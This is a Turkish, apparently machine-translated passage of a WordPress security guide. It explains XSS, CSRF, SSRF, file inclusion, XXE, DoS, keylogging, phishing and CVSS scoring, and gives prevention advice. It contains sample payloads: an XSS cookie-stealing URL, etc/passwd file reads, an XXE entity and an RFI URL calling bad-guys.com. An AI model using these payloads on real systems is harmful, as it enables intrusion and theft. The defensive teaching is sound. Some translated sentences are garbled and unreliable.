Not: Yansıtılan ve Depolanan XSS, sunucu tarafı sorunları iken DOM tabanlı XSS ​​bir istemci (tarayıcı) sorunudur.

Belge Nesnesi Modeli Tabanlı Siteler Arası Komut Dosyası Örneği

Bir DOM XSS saldırısını açıklamanın yaygın bir yolu, özel bir karşılama sayfasıdır. Bir hesap oluşturduktan sonra, diyelim ki yourfavesite.com , aşağıdaki kodu kullanarak sizi adınıza göre karşılayacak şekilde özelleştirilmiş bir karşılama sayfasına yönlendiriliyorsunuz. Ve kullanıcı adı URL'ye kodlanmıştır.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Böylece, yourfavesite.com/account?name=yourname için bir yourfavesite.com/account?name=yourname .

Saldırgan, yeni kullanıcıya aşağıdaki URL'yi göndererek DOM tabanlı bir XSS saldırısı gerçekleştirebilir:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Yeni kullanıcı bağlantıyı tıkladığında, tarayıcısı şunlar için bir istek gönderir:

 /account?name=<script>alert(document.cookie)</script>

bad-guys.com . Web sitesi, yukarıdaki Javascript kodunu içeren sayfayla yanıt verir.

Yeni kullanıcının tarayıcısı olan sayfa için bir DOM nesnesi oluşturur document.location nesne dize içerir:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

Sayfadaki orijinal kod, varsayılan parametrenin, işaretlemeyi sayfaya yansıtarak HTML işaretlemesi içermesini beklemez. Ardından yeni kullanıcının tarayıcısı sayfayı oluşturur ve saldırganın komut dosyasını yürütür:

 alert(document.cookie)

DOM Tabanlı Siteler Arası Komut Dosyası Çalıştırma Nasıl Önlenir

OWASP Dom tabanlı siteler arası komut dosyası çalıştırma önleme hile sayfasındaki 1. Kural, HTML kaçışıdır. Ardından, JS, yürütme bağlamında HTML alt bağlamına güvenilmeyen verileri eklemeden önce kaçar.

Örnek Tehlikeli HTML Yöntemleri:

Öznitellikler

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

yöntemler

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

DOM kasasında HTML'de dinamik güncellemeler yapmak için OWASP şunları önerir:

1. HTML kodlaması ve ardından
2. Bu örneklerde gösterildiği gibi, tüm güvenilmeyen girdileri kodlayan JavaScript:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Siteler Arası İstek Sahteciliği Güvenlik Açığı

CSRF veya Siteler Arası İstek Sahteciliği güvenlik açığı, bir siber suçlu bir kullanıcıyı istenmeyen eylemler gerçekleştirmesi için kandırdığında ortaya çıkar. Saldırgan, kullanıcının bir uygulamaya yönelik isteğini taklit eder.

Siteler Arası İstek Sahteciliği Örneği

Ocak 2020 WordPress Güvenlik Açığı Özetimizde, Kod Parçacıkları eklentisinde bulunan Siteler Arası İstek Sahteciliği güvenlik açığı hakkında rapor vermiştik. (Eklenti, 2.14.0 sürümünde hızlı bir şekilde yamalandı)

Eklentinin CRSF koruması olmaması, herkesin bir yönetici adına sahte istekte bulunmasına ve savunmasız bir siteye yürütülebilir kod enjekte etmesine izin verdi. Saldırgan, kötü amaçlı kod yürütmek ve hatta siteyi tamamen ele geçirmek için bu güvenlik açığından yararlanabilirdi.

Siteler Arası İstek Sahteciliği Nasıl Önlenir

Çoğu kodlama çerçevesi, CSRF'ye karşı koruma sağlamak için yerleşik senkronize belirteç savunmalarına sahiptir ve kullanılmaları gerekir.

PHP ve Apache CSRF güvenlik açıklarını korumak için kullanılabilecek CSRF Protector Project gibi harici bileşenler de vardır.

9. Sunucu Tarafı İstek Sahteciliği Güvenlik Açığı

Bir SSRF veya Sunucu-Site İstek Sahtekarlığı güvenlik açığı, bir saldırganın sunucu tarafı bir uygulamayı, kendi seçtikleri rastgele bir etki alanına HTTP istekleri yapmak için kandırmasına olanak tanır.

Sunucu Tarafı İstek Sahteciliği Örneği

Bir Yansıtılmış Siteler Arası Komut Dosyası Çalıştırma saldırısını gerçekleştirmek için bir SSRF güvenlik açığından yararlanılabilir. Saldırgan, bad-guys.com'dan kötü amaçlı bir komut dosyası alabilir ve bunu bir web sitesinin tüm ziyaretçilerine sunabilir.

Sunucu Tarafı İstek Sahteciliği Nasıl Önlenir

SSRF güvenlik açıklarını azaltmanın ilk adımı, girdileri doğrulamaktır. Örneğin, sunucunuz farklı dosyaları getirmek için kullanıcı tarafından sağlanan URL'lere güveniyorsa, URL'yi doğrulamanız ve yalnızca güvendiğiniz hedef ana bilgisayarlara izin vermeniz gerekir.

SSRF önleme hakkında daha fazla bilgi için OWASP hile sayfasına bakın.

10. Ayrıcalık Yükseltme Güvenlik Açığı

Ayrıcalık Yükseltme güvenlik açığı, bir saldırganın normalde daha yüksek düzeyde ayrıcalıklar gerektiren görevleri yürütmesine olanak tanır.

Ayrıcalık Yükseltme Örneği

Kasım 2020 WordPress Güvenlik Açığı Özetimizde, Ultimate Üye eklentisinde bulunan bir ayrıcalık yükseltme güvenlik açığı hakkında rapor vermiştik (Güvenlik açığı 2.1.12 sürümünde düzeltilmiştir).

Saldırgan, wp_capabilities kullanıcı wp_capabilities için bir kullanıcının rolünü tanımlayan bir dizi parametresi sağlayabilir. Kayıt işlemi sırasında, gönderilen kayıt ayrıntıları update_profile işlevine iletildi ve gönderilenlerden bağımsız olarak gönderilen tüm ilgili meta veriler, bu yeni kayıtlı kullanıcı için güncellenecektir.

Güvenlik açığı, esasen yeni bir kullanıcının kaydolurken yönetici talep etmesine izin verdi.

Ayrıcalık Yükselmesi Nasıl Önlenir

iThemes Security Pro, bir Güvenilir Cihazlar listesine yönetici erişimini kısıtlayarak web sitenizi Bozuk Erişim Kontrolüne karşı korumaya yardımcı olabilir.

11. Uzaktan Kod Yürütme Güvenlik Açığı

Bir RCE veya Uzaktan Kod Yürütme güvenlik açığı, bir saldırganın bir bilgisayara veya sunucuya erişmesine ve bunlarda değişiklik yapmasına ve hatta devralmasına olanak tanır.

Uzaktan Kod Yürütme Örneği

2018'de Microsoft, Excel'de bulunan bir uzaktan kod yürütme güvenlik açığını açıkladı.

Güvenlik açığından başarıyla yararlanan bir saldırgan, geçerli kullanıcı bağlamında rasgele kod çalıştırabilir. Geçerli kullanıcı yönetici kullanıcı haklarıyla oturum açtıysa, bir saldırgan etkilenen sistemin denetimini ele geçirebilir. Saldırgan daha sonra programları yükleyebilir; verileri görüntüleme, değiştirme veya silme; veya tam kullanıcı haklarına sahip yeni hesaplar oluşturun. Hesapları sistemde daha az kullanıcı haklarına sahip olacak şekilde yapılandırılmış kullanıcılar, yönetici kullanıcı haklarıyla çalışan kullanıcılardan daha az etkilenebilir.

Uzaktan Kod Yürütmeyi Önleme

Bir RCE güvenlik açığını azaltmanın en kolay yolu, istenmeyen karakterleri filtreleyerek ve kaldırarak kullanıcı girişini doğrulamaktır.

Ana şirketimiz Liquid Web'in uzaktan kod yürütülmesini önleme konusunda harika bir makalesi var.

14. Dosya Ekleme Güvenlik Açığı

Dosya Ekleme güvenlik açığı, bir web uygulaması, kullanıcının dosyalara girdi göndermesine veya sunucuya dosya yüklemesine izin verdiğinde ortaya çıkar.

Yerel ve Uzak olmak üzere iki tür dosya ekleme güvenlik açığı vardır.

15. Yerel Dosya Ekleme Güvenlik Açığı

Bir LFI veya Yerel Dosya Ekleme güvenlik açığı, bir saldırganın bir web sitesinin sunucusundaki dosyaları okumasına ve bazen yürütmesine olanak tanır.

Yerel Dosya Dahil Etme Örneği

yourfavesite.com include etmek için geçirilen yolların gerektiği gibi temizlenmediği yourfavesite.com bir kez daha bakalım. Örneğin, aşağıdaki URL'ye bir göz atalım.

 yourfavesite.com/module.php?file=example.file

Bir saldırganın, sunucudaki rastgele bir dosyaya erişmek için URL parametresini değiştirmesi mümkündür.

 yourfavesite.com/module.php?file=etc/passwd

URL'deki dosyanın değerini değiştirmek, bir saldırganın psswd dosyasının içeriğini görüntülemesine izin verebilir.

Yerel Dosya Dahil Etmeyi Önleme

Sayfanın içerebileceği izin verilen bir dosya listesi oluşturun, ardından seçilen dosyaya erişmek için bir tanımlayıcı kullanın. Ardından, geçersiz bir tanımlayıcı içeren tüm istekleri engelleyin.

16. Uzak Dosya Ekleme Güvenlik Açığı

Bir RFI veya Uzak Dosya Ekleme güvenlik açığı, bir saldırganın, genellikle hedef uygulamada uygulanan "dinamik dosya ekleme" mekanizmalarından yararlanarak bir dosya eklemesine olanak tanır.

Uzak Dosya Ekleme Örneği

Spritz'li WordPress Eklentisi WP, bir RFI güvenlik açığı olduğu için WordPress.org deposunda kapatıldı.

Güvenlik açığının kaynak kodu aşağıdadır:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

content.filter.php?url= değerinin değeri değiştirilerek koddan yararlanılabilir. Örneğin:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Uzaktan Dosya Dahil Etmeyi Önleme

Sayfanın içerebileceği izin verilen bir dosya listesi oluşturun, ardından seçilen dosyaya erişmek için bir tanımlayıcı kullanın. Ardından, geçersiz bir tanımlayıcı içeren tüm istekleri engelleyin.

17. Dizin Geçişi Güvenlik Açığı

Dizin Geçişi veya Dosya Geçişi güvenlik açığı, bir saldırganın bir uygulamayı çalıştıran sunucudaki rastgele dosyaları okumasına olanak tanır.

Dizin Geçiş Örneği

WordPress 5.7 – 5.03 sürümleri, kullanıcı giriş verilerini düzgün bir şekilde doğrulayamadıkları için dizin geçiş saldırılarına karşı savunmasızdı. En azından author ayrıcalıklarına sahip bir hesaba erişimi olan bir saldırgan, dizin geçişi güvenlik açığından yararlanabilir ve temel alınan sunucuda kötü amaçlı PHP kodu yürüterek tam bir uzaktan ele geçirmeye yol açabilir.

Dizin Geçişi Nasıl Önlenir

Geliştiriciler, dil dosyalarını şablonlarken veya kullanırken dosya adlarının gerçek bölümleri yerine dizinleri kullanabilir.

18. Kötü Amaçlı Yönlendirme Güvenlik Açığı

Kötü Amaçlı Yeniden Yönlendirme güvenlik açığı, bir saldırganın site ziyaretçilerini başka bir web sitesine yönlendirmek için kod enjekte etmesine olanak tanır.

Kötü Amaçlı Yönlendirme Örneği

Diyelim ki bir çevrimiçi butikte arama aracını kullanarak mavi bir kazak arıyorsunuz.

Ne yazık ki, butiğin sunucusu, kullanıcı girişlerini düzgün bir şekilde kodlayamıyor ve bir saldırgan, arama sorgunuza kötü amaçlı bir yönlendirme komut dosyası ekleyebildi.

Bu nedenle, butiğin arama alanına mavi kazak yazıp enter tuşuna bastığınızda, aramanızın açıklamasına uyan kazakların olduğu butik sayfası yerine saldırganın web sayfasına çıkıyorsunuz.

Kötü Amaçlı Yönlendirme Nasıl Önlenir

Kullanıcı girişlerini temizleyerek, URL'leri doğrulayarak ve tüm site dışı yönlendirmeler için ziyaretçi onayı alarak kötü amaçlı yönlendirmelere karşı koruma sağlayabilirsiniz.

19. XML Dış Varlık Güvenlik Açığı

Bir XXE veya XML Harici Varlık güvenlik açığı, bir saldırganın bir XML ayrıştırıcısını hassas bilgileri kendi denetimi altındaki harici bir varlığa geçirmesi için kandırmasına olanak tanır.

XML Harici Varlık Örneği

Saldırgan, kullanıcı hesabı bilgilerini depolayan etc/passwd gibi hassas dosyalara erişim sağlamak için bir XXE güvenlik açığından yararlanabilir.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

XML Harici Varlık Nasıl Önlenir

XXE'yi önlemenin en iyi yolu, JSON gibi daha az karmaşık veri biçimleri kullanmak ve hassas verilerin serileştirilmesinden kaçınmaktır.

20. Hizmet Reddi Saldırısı

DoS veya Hizmet Reddi saldırısı, web sitenizi veya uygulamanızı ağ trafiğiyle doldurarak kullanıcılar tarafından kullanılamaz hale getirmeye yönelik kasıtlı bir girişimdir.

DDoS Dağıtılmış Hizmet Reddi saldırısında, bir saldırgan bir ağı trafikle doldurmak için birden çok kaynak kullanır. Saldırgan, trafik akışını artırmak için kötü amaçlı yazılım bulaşmış bilgisayar, yönlendirici ve IoT cihaz gruplarını ele geçirir.

Hizmet Reddi Saldırısı Örneği

Şimdiye kadarki en büyük DDoS (Dağıtılmış Hizmet Reddi) saldırısı, bu yılın Şubat ayında AWS'ye karşı yapıldı. Amazon, yönetilen tehdit koruma hizmeti olan AWS Shield'in bu büyük DDoS saldırısını gözlemlediğini ve azalttığını bildirdi. Saldırı 3 gün sürdü ve saniyede 2,3 Terabayta ulaştı.

Hizmet Reddi Saldırısı Nasıl Önlenir

Bir DoS saldırısını azaltmanın 2 ana yolu vardır.

1. İhtiyacınızdan daha fazla hosting satın alın. Emrinizde ekstra kaynaklara sahip olmak, bir DoS saldırısının neden olduğu artan talebin üstesinden gelmenize yardımcı olabilir.
2. Cloudflare gibi sunucu düzeyinde bir güvenlik duvarı kullanın. Bir güvenlik duvarı, trafikte olağandışı bir artış algılayabilir ve web sitenizin aşırı yüklenmesini önleyebilir.

21. Tuş Kaydı

Tuş Kaydı veya klavye yakalama olarak da bilinen Tuş Kaydı , bir bilgisayar korsanının web sitesi ziyaretçilerinin tuş vuruşlarını gizlice izlediği ve kaydettiği zaman gerçekleşir.

Tuş Kaydı Örneği

2017'de bir bilgisayar korsanı, akıllı telefon üreticisi OnePlus'ın sunucularına kötü amaçlı JavaScript'i başarıyla yükledi.

Saldırganlar, kötü amaçlı kodu kullanarak, OnePlus müşterilerinin kredi kartı bilgilerini girerken tuş vuruşlarını izledi ve kaydetti. Bilgisayar korsanları, OnePlus hack'i tespit edip düzeltmeden önce 40.000 müşterinin tuş vuruşlarını günlüğe kaydetti ve topladı.

Tuş Kaydı Nasıl Engellenir

Her şeyi güncelleyin! Tipik olarak, bir saldırganın bir bilgisayara veya sunucuya bir keylogger enjekte etmek için mevcut başka bir güvenlik açığından yararlanması gerekir. Her şeyi en son güvenlik yamalarıyla güncel tutmak, bilgisayar korsanlarına web sitenize veya bilgisayarınıza keylogger kurmanın kolay bir yolunu sunmayı önleyecektir.

Bonus: Kimlik Avı

Bilgisayar korsanlarının ve siber suçluların yararlanmaya çalıştığı tek şey yazılım açıklarıdır. Bilgisayar korsanları ayrıca insanları hedef alır ve sömürür. Yaygın bir istismar yöntemi Kimlik Avıdır.

Kimlik Avı nedir?

Kimlik avı, kurbanı kişisel bilgilerini vermesi için kandırmak için e-posta, sosyal medya, metin mesajları ve telefon görüşmelerini kullanan bir siber saldırı yöntemidir. Saldırgan daha sonra bilgileri kişisel hesaplara erişmek veya kimlik sahtekarlığı yapmak için kullanır.

Kimlik Avı E-postası Nasıl Belirlenir

Bu gönderide daha önce öğrendiğimiz gibi, bazı güvenlik açıklarından yararlanmak için bir tür kullanıcı etkileşimi gerekir. Bir bilgisayar korsanının insanları hain girişimlerine katılmaları için kandırmasının bir yolu, kimlik avı e-postaları göndermektir.

Bir kimlik avı e-postasını nasıl tespit edeceğinizi öğrenmek, sizi yanlışlıkla siber suçluların planlarına girmekten kurtarabilir.

Bir kimlik avı e-postasını tespit etmek için 4 ipucu :

1. Gönderen e-posta adresine bakın – Bir işletmeden e-posta alırsanız, gönderenin e-posta adresinin “@” işaretinden sonraki kısmı işletme adıyla eşleşmelidir.
   
   Bir e-posta bir şirketi veya devlet kurumunu temsil ediyorsa ancak "@gmail" gibi herkese açık bir e-posta adresi kullanıyorsa, kimlik avı e-postasının bir işaretidir.
   
   Alan adının ince yazım yanlışlarına dikkat edin. Örneğin şu e-posta adresine bakalım [email protected] Netflix'in sonunda fazladan bir “x” olduğunu görebiliyoruz. Yazım hatası, e-postanın bir dolandırıcı tarafından gönderildiğinin ve derhal silinmesi gerektiğinin açık bir işaretidir.
   
2. Dilbilgisi hatalarına bakın - Dilbilgisi hatalarıyla dolu bir e-posta, kötü niyetli bir e-postanın işaretidir. Tüm kelimeler doğru yazılabilir, ancak cümlelerde cümleyi tutarlı kılacak kelimeler eksiktir. Örneğin, “Hesabınız saldırıya uğradı. Hesap güvenliği için şifreyi güncelleyin”.
   
   Herkes hata yapar ve bir veya iki yazım hatası olan her e-posta sizi dolandırma girişimi değildir. Bununla birlikte, birden fazla dilbilgisi hatası, yanıt vermeden önce daha yakından bakmayı garanti eder.
   
3. Şüpheli ekler veya bağlantılar – Bir e-postada yer alan herhangi bir ek veya bağlantıyla etkileşime geçmeden önce bir an duraklamaya değer.
   
   Bir e-postayı göndereni tanımıyorsanız, kötü amaçlı yazılım içerebileceği ve bilgisayarınıza bulaşabileceği için e-postadaki ekleri indirmemelisiniz. E-postanın bir işletmeden geldiğini iddia ederse, herhangi bir eki açmadan önce e-postanın kendilerinden gönderildiğini doğrulamak için iletişim bilgilerini Google'da aratabilirsiniz.
   
   Bir e-posta bir bağlantı içeriyorsa, URL'nin sizi olması gereken yere gönderdiğini doğrulamak için farenizi bağlantının üzerine getirebilirsiniz.
   
4. Acil isteklere dikkat edin – Dolandırıcılar tarafından kullanılan yaygın bir numara, aciliyet duygusu yaratmaktır. Kötü amaçlı bir e-posta, hemen eyleme geçilmesi gereken bir senaryo oluşturabilir. Düşünmek için ne kadar zamanınız olursa, talebin bir dolandırıcıdan geldiğini belirleme şansınız o kadar artar.
   
   "Patronunuzdan", bir satıcıya en kısa sürede ödeme yapmanızı isteyen bir e-posta veya bankanızdan hesabınızın saldırıya uğradığını ve derhal harekete geçilmesi gerektiğini bildiren bir e-posta alabilirsiniz.

WordPress Güvenlik Açığının Önemi Nasıl Ölçülür?

Hepsi değişen derecelerde risk içeren çeşitli WordPress güvenlik açıkları vardır. Şansımıza, Ulusal Bilim ve Teknoloji Enstitüsü'nün bir projesi olan Ulusal Güvenlik Açığı Veritabanı, bir güvenlik açığı riskini belirlemek için bir güvenlik açığı puanlama sistemi hesaplayıcısına sahiptir.

WordPress güvenlik açığı kılavuzunun bu bölümü, güvenlik açığı puanlama sisteminin ölçümlerini ve önem düzeylerini kapsayacaktır. Bu bölüm biraz daha teknik olsa da, bazı kullanıcılar WordPress güvenlik açıklarının ve önem derecelerinin nasıl değerlendirildiği konusundaki anlayışlarını derinleştirmek için faydalı bulabilir.

Ortak WordPress Güvenlik Açığı Puanlama Sistemi Metrikleri

Güvenlik açığı puanlama sisteminin denklemi, genel önem puanını belirlemek için üç farklı puan kümesi kullanır.

1. Temel Metrikler

Temel ölçüm grubu, kullanıcı ortamlarında sabit olan bir güvenlik açığının özelliklerini temsil eder.

Temel metrikler, Yararlanılabilirlik ve Etki olmak üzere iki gruba ayrılır.

1.1. Kullanılabilirlik Metrikleri

Sömürülebilirlik puanı, bir saldırganın güvenlik açığından yararlanmasının ne kadar zor olduğuna bağlıdır. Skor 5 farklı değişken kullanılarak hesaplanır.

1.1.1. Saldırı Vektörü (AV)

Saldırı vektörü puanı, güvenlik açığından yararlanma yöntemine bağlıdır. Bir saldırgan güvenlik açığından yararlanmak için ne kadar uzak olursa, puan o kadar yüksek olacaktır.

Buradaki fikir, bir cihazdan yararlanmaya fiziksel erişim gerektiren bir güvenlik açığına kıyasla, güvenlik açığı bir ağ üzerinden kullanılabilirse, potansiyel saldırganların sayısının çok daha fazla olacağıdır.

Potansiyel saldırganlar ne kadar fazla olursa, istismar riski o kadar yüksek olur ve bu nedenle, güvenlik açığına verilen Saldırı Vektörü puanı daha yüksek olacaktır.

1.1.2. Saldırı Karmaşıklığı (AC)

Karmaşıklık değeri, güvenlik açığından yararlanmak için gereken koşullara dayanır. Bazı koşullar, hedef, belirli sistem yapılandırma ayarlarının varlığı veya hesaplama istisnaları hakkında daha fazla bilgi toplanmasını gerektirebilir.

Saldırı karmaşıklığı puanı, güvenlik açığından yararlanmak için gereken karmaşıklık ne kadar düşükse o kadar yüksek olacaktır.

1.1.3. Gerekli Ayrıcalıklar (PR)

Gerekli ayrıcalıklar puanı, bir saldırganın bir güvenlik açığından yararlanmadan önce elde etmesi gereken ayrıcalıklara göre hesaplanır. Buna Kimliği Doğrulanmış ve Kimliği Doğrulanmamış bölümünde biraz daha dalacağız.

Herhangi bir ayrıcalık gerekmiyorsa puan en yüksek olacaktır.

1.1.4. Kullanıcı Etkileşimi (UI)

Kullanıcı etkileşimi puanı, bir güvenlik açığından yararlanmak için kullanıcı etkileşimi gerektirip gerektirmediğine göre belirlenir.

Bir saldırganın güvenlik açığından yararlanması için kullanıcı etkileşimi gerekmediğinde puan en yüksek olacaktır.

1.1.5. Kapsam

Kapsam puanı, güvenlik kapsamı dışındaki kaynakları etkilemek için bir yazılım bileşenindeki güvenlik açığına dayanır.

Güvenlik kapsamı, bu diğer bileşenlerin kendi güvenlik yetkilerine sahip olsalar bile, yalnızca o bileşene işlevsellik sağlayan diğer bileşenleri kapsar.

Bir kapsam değişikliği meydana geldiğinde puan en yüksektir.

1.2. Etki Metrikleri

Etki ölçümleri, başarıyla yararlanılan bir güvenlik açığının doğrudan etkilerini yakalar.

1.2.1. Gizli Etki (C)

Bu gizli etki puanı, istismar edilen yazılım tarafından yönetilen bilgilerin gizliliği üzerindeki etkiyi ölçer.

Etkilenen yazılımın kaybı en yüksek olduğunda puan en yüksek olur.

1.2.2. Bütünlük (I)

Bu bütünlük puanı, başarıyla yararlanılan bir güvenlik açığının bütünlüğü üzerindeki etkisine dayanır.

Etkilenen yazılımın sonucu en yüksek olduğunda puan en yüksek olur.

1.2.3. Kullanılabilirlik (A)

Kullanılabilirlik puanı, yararlanılan yazılımın kullanılabilirliğinin etkisine dayanır.

Etkilenen bileşenin sonucu en büyük olduğunda Skor en yüksektir.

Temel Puan CVSS Puanı Hesaplama

Temel Puan, Etki ve Kullanılabilirlik alt puan denklemlerinin bir fonksiyonudur. Taban puanın şu şekilde tanımlandığı yerde,

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Geçici Puan Metrikleri

Geçici ölçümler, istismar tekniklerinin mevcut durumunu, herhangi bir yama veya geçici çözümün varlığını veya bir güvenlik açığının tanımına olan güveni ölçer.

Zamansal metriklerin zaman içinde değişmesi beklenir ve değişecektir.

2.1. Exploit Kodu Olgunluk (E)

Açıktan yararlanma kodunun olgunluğu, güvenlik açığının saldırıya uğrama olasılığına bağlıdır.

Bir güvenlik açığından ne kadar kolay yararlanılırsa, güvenlik açığı puanı o kadar yüksek olur.

2.2. Düzeltme Düzeyi (RL)

Bir güvenlik açığının Düzeltme Düzeyi, önceliklendirme için önemli bir faktördür. Geçici çözümler veya düzeltmeler, resmi bir yama veya yükseltme yayınlanana kadar geçici düzeltme sağlayabilir.

Bir düzeltme ne kadar az resmi ve kalıcı olursa, güvenlik açığı puanı o kadar yüksek olur.

2.3. Güven Bildir (RC)

Rapor Güveni metriği, bir güvenlik açığının bulunduğuna ilişkin güven düzeyini ve teknik ayrıntıların güvenilirliğini ölçer.

Bir güvenlik açığı satıcı veya diğer saygın kaynaklar tarafından ne kadar doğrulanırsa, puan o kadar yüksek olur.

Geçici CVSS Puanı Hesaplama

Geçici puan şu şekilde tanımlanır:

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Çevresel Puan Metrikleri

Çevresel ölçümler, analistlerin etkilenen BT varlıklarının önemine göre puanlanan CVSS'yi özelleştirmesine olanak tanır.

Çevresel Kullanılabilirlik ve Etki metrikleri, Temel metriklerin değiştirilmiş bir eşdeğeridir ve kurumsal altyapının bileşen yerleşimine dayalı olarak değerler atanır. Kullanılabilirlik ve Etki metriklerinin değerlerini ve açıklamalarını görüntülemek için yukarıdaki Temel Metrikler bölümlerine bakın.

Çevresel metrikler, ekstra bir grup olan Etki Alt Puan Değiştiricileri içerir.

3.1. Etki Alt Puan Değiştirici Metrikleri

Etki Alt Puanı Değiştiricileri metrikleri, Gizlilik (CR), Bütünlük (IR) ve Kullanılabilirlik (AR) için belirli güvenlik gereksinimlerini değerlendirerek, çevresel puanın kullanıcıların ortamına göre ince ayarlanmasına olanak tanır.

Çevresel CVSS Puanı Hesaplama

Çevre puanı şu şekilde tanımlanır:

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Genel CVSS Puanı ve Önem Derecesi

Genel Ortak Güvenlik Açığı Puanlama Sistemi veya CVSS puanı, Temel, Geçici ve Çevre puanlarının bir temsilidir.

Genel CVSS puanı, bir güvenlik açığının ne kadar ciddi veya ciddi olduğu konusunda size bir fikir vermek için kullanılabilir.

Gerçek Dünya CVSS Önem Derecesi Örneği

Aralık 2020 Güvenlik Açığı Özetimizde, Easy WP SMTP eklentisindeki bir güvenlik açığını bildirdik. Sıfır gün (sıfır gün güvenlik açıklarını bir sonraki bölümde ele alacağız) güvenlik açığı, bir saldırganın bir Yönetici hesabının kontrolünü ele geçirmesine izin verdi ve vahşi bir şekilde istismar edildi.

Ulusal Güvenlik Açığı Veritabanı girişine göz atarak, WP SMTP güvenlik açığının önem derecesini bulabiliriz.

Yukarıdaki WP SMTP NVDB ekran görüntüsünden birkaç şeyi inceleyelim.

Temel Puan : Taban puan 7.5'tir ve bu bize güvenlik açığının önem derecesinin yüksek olduğunu gösterir.

Vektör : Vektör bize skorun CVSS 3.1 güvenlik açığı denklemlerine ve skoru hesaplamak için kullanılan metriklere dayandığını söyler.

İşte vektörün metrik kısmı.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Şimdi, vektörün sekiz metrik değerini anlamak için bu yazının başlarındaki Temel Metrik değerlerini ve açıklamalarını kullanalım.

1. AV:N – Bu, güvenlik açığının Saldırı Vektörünün (AV) Ağ (N) olduğu anlamına gelir. Başka bir deyişle, bir saldırganın güvenlik açığından yararlanmak için yalnızca ağ erişimine ihtiyacı vardır.
2. AC:L – Güvenlik açığının Saldırı Karmaşıklığı (AC) Düşük (L). Başka bir deyişle, herhangi bir komut dosyası çocuğu güvenlik açığından yararlanabilir.
3. PR:N – Güvenlik açığından yararlanmak için gereken Ayrıcalıklar (PR) Yoktur (N). Bu nedenle, güvenlik açığı, kimliği doğrulanmış bir kullanıcının yararlanmasını gerektirmez. (Kimliği Doğrulanmış ve Kimliği Doğrulanmamış güvenlik açıkları arasındaki farkı bu yazının ilerleyen bölümlerinde ele alacağız.)
4. UI:N – Bu güvenlik açığından yararlanmak için gereken Kullanıcı Etkileşimi (UI) Yoktur (N). Böylece saldırgan, güvenlik açığından kendi kendine yararlanma imkanına sahiptir.
5. S:U – Bu, güvenlik açığının Kapsamının (S) Değişmedi (U) olduğu anlamına gelir. Bu güvenlik açığı durumunda, güvenlik açığı bulunan bileşen ve etkilenen bileşen aynıdır.
6. C:H – Güvenlik açığının Gizlilik Etkisi (C) Yüksek (H). Bu güvenlik açığından yararlanıldığında, tamamen gizlilik kaybına neden olur.
7. I:N – Bu güvenlik açığının Bütünlük Etkisi (I) Yoktur (N). Güvenlik açığından yararlanıldığında, güvenlik açığı bulunan bilgilerin bütünlüğü veya güvenilirliğinde herhangi bir kayıp olmaz.
8. A:N – Bu, Kullanılabilirlik Etkisinin (A) Yok (N) olduğu anlamına gelir. Güvenlik açığından yararlanıldığında, web sitenizin kullanılabilirliği üzerinde hiçbir etkisi olmayacaktır.

CVSS puanı, herhangi bir güvenlik açığının önem derecesini ve kapsamını belirlememize yardımcı olabilir. Sonraki birkaç bölümde, genellikle güvenlik açığı açıklamalarında yer alan bazı önemli güvenlik açığı terimlerini ele alacağız.

Toplama

Bu bölümde, bilgisayar korsanlarının motivasyonları, farklı saldırı türleri, çevrimiçi suçluların yararlandığı güvenlik açıkları, güvenlik açıkları riskinin nasıl azaltılacağı ve bir güvenlik açığının sizin için oluşturduğu riskin nasıl belirleneceği dahil olmak üzere WordPress güvenliğinin birkaç önemli unsurunu öğrendik. İnternet sitesi.

Saldırganların web sitelerimizi nasıl hacklemeye çalıştıklarını ve web sitelerimizi ihlal ettikten sonra hedeflerini anlamak, uygun savunmaları oluşturmamızı sağlar.

İlerleyen bölümlerde, web sitenizi bir bilgisayar korsanının size yapabileceği neredeyse her tür saldırıdan nasıl koruyacağınızı öğreneceksiniz.

